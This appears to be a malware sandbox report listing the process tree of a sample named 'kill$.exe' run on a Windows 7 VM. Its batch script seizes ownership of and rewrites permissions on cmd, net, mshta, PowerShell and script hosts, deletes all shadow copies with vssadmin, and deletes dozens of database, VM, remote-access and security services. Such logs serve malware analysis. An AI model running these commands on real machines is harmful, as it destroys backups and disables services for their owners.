Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 6, 2021, 9:21 a.m. | Aug. 6, 2021, 9:50 a.m. |
-
-
cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\63A4.tmp\63A5.tmp\63A6.bat C:\Users\test22\AppData\Local\Temp\kill$.exe"
2252-
reg.exe reg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor" /v "AutoRun" /f
2724 -
takeown.exe takeown /f C:\Windows\system32\cmd.exe /a
2760 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1808 -
cacls.exe cacls C:\Windows\system32\cmd.exe /g Administrators:f
1316 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2420 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Users:r
2892 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1296 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g Administrators:r
2448 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1468 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d SERVICE
872 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2084 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssqlserver
2988 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2660 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d "network service"
2772 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1940 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /g system:r
1572 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2680 -
cacls.exe cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
1976 -
takeown.exe takeown /f C:\Windows\SysWOW64\cmd.exe /a
2092 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2720 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
2144 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
596 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
2408 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
852 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
1108 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2212 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
1164 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2384 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
2256 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3108 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d "network service"
3148 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3200 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /g system:r
3240 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3292 -
cacls.exe cacls C:\Windows\SysWOW64\cmd.exe /e /d mssql$sqlexpress
3332 -
takeown.exe takeown /f C:\Windows\system32\net.exe /a
3384 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3432 -
cacls.exe cacls C:\Windows\system32\net.exe /g Administrators:f
3472 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3524 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Users:r
3564 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3616 -
cacls.exe cacls C:\Windows\system32\net.exe /e /g Administrators:r
3656 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3708 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d SERVICE
3748 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3800 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssqlserver
3840 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3892 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d "network service"
3932 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3984 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d system
4024 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4076 -
cacls.exe cacls C:\Windows\system32\net.exe /e /d mssql$sqlexpress
3096 -
takeown.exe takeown /f C:\Windows\SysWOW64\net.exe /a
3180 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3260 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /g Administrators:f
3312 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3376 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Users:r
3448 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3516 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /g Administrators:r
3596 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3672 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d SERVICE
2248 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2344 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssqlserver
3660 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3792 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d "network service"
3872 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3952 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d system
4004 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4068 -
cacls.exe cacls C:\Windows\SysWOW64\net.exe /e /d mssql$sqlexpress
3120 -
takeown.exe takeown /f C:\Windows\system32\net1.exe /a
3232 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3256 -
cacls.exe cacls C:\Windows\system32\net1.exe /g Administrators:f
3460 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3580 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Users:r
3644 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2428 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /g Administrators:r
3740 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3856 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d SERVICE
3920 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4028 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssqlserver
3160 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3344 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d "network service"
3536 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
1452 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d system
3712 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3924 -
cacls.exe cacls C:\Windows\system32\net1.exe /e /d mssql$sqlexpress
3972 -
takeown.exe takeown /f C:\Windows\SysWOW64\net1.exe /a
3320 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3512 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /g Administrators:f
3488 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3884 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Users:r
2200 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3604 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /g Administrators:r
3788 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3948 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d SERVICE
3272 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3620 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssqlserver
2356 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
3584 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d "network service"
2080 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
3348 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d system
3944 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4108 -
cacls.exe cacls C:\Windows\SysWOW64\net1.exe /e /d mssql$sqlexpress
4148 -
takeown.exe takeown /f C:\Windows\system32\mshta.exe /a
4200 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4252 -
cacls.exe cacls C:\Windows\system32\mshta.exe /g Administrators:f
4292 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4344 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /g Users:r
4384 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4436 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /g Administrators:r
4476 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4528 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d SERVICE
4568 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4620 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d mssqlserver
4660 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4712 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d "network service"
4752 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4804 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d system
4844 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4896 -
cacls.exe cacls C:\Windows\system32\mshta.exe /e /d mssql$sqlexpress
4936 -
takeown.exe takeown /f C:\Windows\SysWOW64\mshta.exe /a
4988 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5036 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /g Administrators:f
5076 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4104 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /g Users:r
4160 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
2520 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /g Administrators:r
4284 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4364 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d SERVICE
4424 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4504 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d mssqlserver
4560 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4636 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d "network service"
4700 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4780 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d system
4832 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4912 -
cacls.exe cacls C:\Windows\SysWOW64\mshta.exe /e /d mssql$sqlexpress
4900 -
takeown.exe takeown /f C:\Windows\system32\FTP.exe /a
5088 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4136 -
cacls.exe cacls C:\Windows\system32\FTP.exe /g Administrators:f
4180 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4360 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /g Users:r
4388 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4580 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /g Administrators:r
2340 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4692 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d SERVICE
4708 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4916 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d mssqlserver
5004 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5116 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d "network service"
4112 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4372 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d system
4296 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4556 -
cacls.exe cacls C:\Windows\system32\FTP.exe /e /d mssql$sqlexpress
4784 -
takeown.exe takeown /f C:\Windows\SysWOW64\FTP.exe /a
4952 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4992 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /g Administrators:f
4196 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4464 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /g Users:r
4524 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4756 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /g Administrators:r
4848 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5016 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d SERVICE
4744 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5048 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d mssqlserver
4956 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
4908 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d "network service"
2120 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
4480 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d system
4240 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5156 -
cacls.exe cacls C:\Windows\SysWOW64\FTP.exe /e /d mssql$sqlexpress
5196 -
takeown.exe takeown /f C:\Windows\system32\wscript.exe /a
5248 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5296 -
cacls.exe cacls C:\Windows\system32\wscript.exe /g Administrators:f
5336 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5388 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /g Users:r
5428 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5480 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /g Administrators:r
5520 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5572 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d SERVICE
5612 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5664 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d mssqlserver
5704 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5756 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d "network service"
5796 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5848 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d system
5888 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5940 -
cacls.exe cacls C:\Windows\system32\wscript.exe /e /d mssql$sqlexpress
5980 -
takeown.exe takeown /f C:\Windows\SysWOW64\wscript.exe /a
6032 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6080 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /g Administrators:f
6120 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5188 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /g Users:r
5240 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5328 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /g Administrators:r
5384 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5392 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d SERVICE
5536 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5600 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d mssqlserver
5616 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5776 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d "network service"
5760 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5920 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d system
5972 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6048 -
cacls.exe cacls C:\Windows\SysWOW64\wscript.exe /e /d mssql$sqlexpress
6112 -
takeown.exe takeown /f C:\Windows\system32\cscript.exe /a
6124 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5288 -
cacls.exe cacls C:\Windows\system32\cscript.exe /g Administrators:f
5376 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5432 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /g Users:r
5588 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5720 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /g Administrators:r
5808 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5936 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d SERVICE
5916 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5132 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d mssqlserver
5236 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
5324 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d "network service"
5564 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5748 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d system
5900 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6060 -
cacls.exe cacls C:\Windows\system32\cscript.exe /e /d mssql$sqlexpress
5228 -
takeown.exe takeown /f C:\Windows\SysWOW64\cscript.exe /a
5456 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5524 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /g Administrators:f
5944 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5448 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /g Users:r
5500 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6024 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /g Administrators:r
5540 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5420 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d SERVICE
5708 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
5340 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d mssqlserver
6168 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6220 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d "network service"
6260 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6312 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d system
6352 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6404 -
cacls.exe cacls C:\Windows\SysWOW64\cscript.exe /e /d mssql$sqlexpress
6444 -
takeown.exe takeown /f C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /a
6496 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6544 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
6584 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6636 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
6676 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6728 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
6768 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6820 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
6884 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6936 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
6976 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7028 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
7068 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7120 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d system
7160 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
2544 -
cacls.exe cacls C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
6276 -
takeown.exe takeown /f C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /a
6340 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6424 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /g Administrators:f
6484 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6560 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Users:r
6624 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6704 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /g Administrators:r
6756 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6832 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d SERVICE
6896 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6956 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssqlserver
2192 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7096 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d "network service"
7132 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6236 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d system
6216 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6464 -
cacls.exe cacls C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe /e /d mssql$sqlexpress
6416 -
takeown.exe takeown /f C:\ProgramData /a
6664 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6748 -
cacls.exe cacls C:\ProgramData /g Administrators:f
6788 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6952 -
cacls.exe cacls C:\ProgramData /e /g Users:r
6980 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6160 -
cacls.exe cacls C:\ProgramData /e /g Administrators:r
6252 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6332 -
cacls.exe cacls C:\ProgramData /e /d SERVICE
6612 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6740 -
cacls.exe cacls C:\ProgramData /e /d mssqlserver
6824 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6968 -
cacls.exe cacls C:\ProgramData /e /d "network service"
7124 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6524 -
cacls.exe cacls C:\ProgramData /e /d system
6720 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
6992 -
cacls.exe cacls C:\ProgramData /e /d mssql$sqlexpress
6188 -
takeown.exe takeown /f C:\Users\Public /a
6652 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6852 -
cacls.exe cacls C:\Users\Public /g Administrators:f
6264 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6472 -
cacls.exe cacls C:\Users\Public /e /g Users:r
6572 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
6860 -
cacls.exe cacls C:\Users\Public /e /g Administrators:r
6996 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7212 -
cacls.exe cacls C:\Users\Public /e /d SERVICE
7252 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7304 -
cacls.exe cacls C:\Users\Public /e /d mssqlserver
7344 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7396 -
cacls.exe cacls C:\Users\Public /e /d "network service"
7460 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo y"
7512 -
cacls.exe cacls C:\Users\Public /e /d system
7552 -
cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
7604 -
cacls.exe cacls C:\Users\Public /e /d mssql$sqlexpress
7644 -
vssadmin.exe vssadmin delete shadows /all /quiet
7696 -
cmd.exe cmd /c "color b & @sc delete "XT800Service_Personal" & @sc delete SQLSERVERAGENT & @sc delete SQLWriter & @sc delete SQLBrowser & @sc delete MSSQLFDLauncher & @sc delete MSSQLSERVER & @sc delete QcSoftService & @sc delete MSSQLServerOLAPService & @sc delete VMTools & @sc delete VGAuthService & @sc delete MSDTC & @sc delete TeamViewer & @sc delete ReportServer & @sc delete RabbitMQ & @sc delete "AHS SERVICE" & @sc delete "Sense Shield Service" & @sc delete SSMonitorService & @sc delete SSSyncService & @sc delete TPlusStdAppService1300 & @sc delete MSSQL$SQL2008 & @sc delete SQLAgent$SQL2008 & @sc delete TPlusStdTaskService1300 & @sc delete TPlusStdUpgradeService1300 & @sc delete VirboxWebServer & @sc delete jhi_service & @sc delete LMS & @sc delete "FontCache3.0.0.0" & @sc delete "OSP Service""
7824-
sc.exe sc delete "XT800Service_Personal"
8056 -
sc.exe sc delete SQLSERVERAGENT
7388 -
sc.exe sc delete SQLWriter
8036 -
sc.exe sc delete SQLBrowser
7440 -
sc.exe sc delete MSSQLFDLauncher
8696 -
sc.exe sc delete MSSQLSERVER
9132 -
sc.exe sc delete QcSoftService
8736 -
sc.exe sc delete MSSQLServerOLAPService
8748 -
sc.exe sc delete VMTools
8428 -
sc.exe sc delete VGAuthService
9656 -
sc.exe sc delete MSDTC
9324 -
sc.exe sc delete TeamViewer
9420 -
sc.exe sc delete ReportServer
8992 -
sc.exe sc delete RabbitMQ
8752 -
sc.exe sc delete "AHS SERVICE"
8684 -
sc.exe sc delete "Sense Shield Service"
10424 -
sc.exe sc delete SSMonitorService
10764 -
sc.exe sc delete SSSyncService
11060 -
sc.exe sc delete TPlusStdAppService1300
10520 -
sc.exe sc delete MSSQL$SQL2008
10808 -
sc.exe sc delete SQLAgent$SQL2008
10572 -
sc.exe sc delete TPlusStdTaskService1300
10404 -
sc.exe sc delete TPlusStdUpgradeService1300
10976 -
sc.exe sc delete VirboxWebServer
9288 -
sc.exe sc delete jhi_service
11732 -
sc.exe sc delete LMS
11396 -
sc.exe sc delete "FontCache3.0.0.0"
12232 -
sc.exe sc delete "OSP Service"
12108
-
-
cmd.exe cmd /c "color b & @sc delete "DAService_TCP" & @sc delete "eCard-TTransServer" & @sc delete eCardMPService & @sc delete EnergyDataService & @sc delete UI0Detect & @sc delete K3MobileService & @sc delete TCPIDDAService & @sc delete WebAttendServer & @sc delete UIODetect & @sc delete "wanxiao-monitor" & @sc delete VMAuthdService & @sc delete VMUSBArbService & @sc delete VMwareHostd & @sc delete "vm-agent" & @sc delete VmAgentDaemon & @sc delete OpenSSHd & @sc delete eSightService & @sc delete apachezt & @sc delete Jenkins & @sc delete secbizsrv & @sc delete SQLTELEMETRY & @sc delete MSMQ & @sc delete smtpsvrJT & @sc delete zyb_sync & @sc delete 360EntHttpServer & @sc delete 360EntSvc & @sc delete 360EntClientSvc & @sc delete NFWebServer & @sc delete wampapache & @sc delete MSSEARCH & @sc delete msftesql & @sc delete "SyncBASE Service" & @sc delete OracleDBConcoleorcl & @sc delete OracleJobSchedulerORCL & @sc delete OracleMTSRecoveryService"
7908-
sc.exe sc delete "DAService_TCP"
1856 -
sc.exe sc delete "eCard-TTransServer"
7716 -
sc.exe sc delete eCardMPService
7424 -
sc.exe sc delete EnergyDataService
8424 -
sc.exe sc delete UI0Detect
9016 -
sc.exe sc delete K3MobileService
8800 -
sc.exe sc delete TCPIDDAService
8196 -
sc.exe sc delete WebAttendServer
8644 -
sc.exe sc delete UIODetect
9812 -
sc.exe sc delete "wanxiao-monitor"
8792 -
sc.exe sc delete VMAuthdService
9708 -
sc.exe sc delete VMUSBArbService
10004 -
sc.exe sc delete VMwareHostd
8528 -
sc.exe sc delete "vm-agent"
9440 -
sc.exe sc delete VmAgentDaemon
10348 -
sc.exe sc delete OpenSSHd
10644 -
sc.exe sc delete eSightService
10960 -
sc.exe sc delete apachezt
10416 -
sc.exe sc delete Jenkins
10912 -
sc.exe sc delete secbizsrv
8824 -
sc.exe sc delete SQLTELEMETRY
10712 -
sc.exe sc delete MSMQ
10396 -
sc.exe sc delete smtpsvrJT
11144 -
sc.exe sc delete zyb_sync
10984 -
sc.exe sc delete 360EntHttpServer
11548 -
sc.exe sc delete 360EntSvc
12008 -
sc.exe sc delete 360EntClientSvc
11340 -
sc.exe sc delete NFWebServer
12192 -
sc.exe sc delete wampapache
11516 -
sc.exe sc delete MSSEARCH
11572 -
sc.exe sc delete msftesql
11784 -
sc.exe sc delete "SyncBASE Service"
12152 -
sc.exe sc delete OracleDBConcoleorcl
12616 -
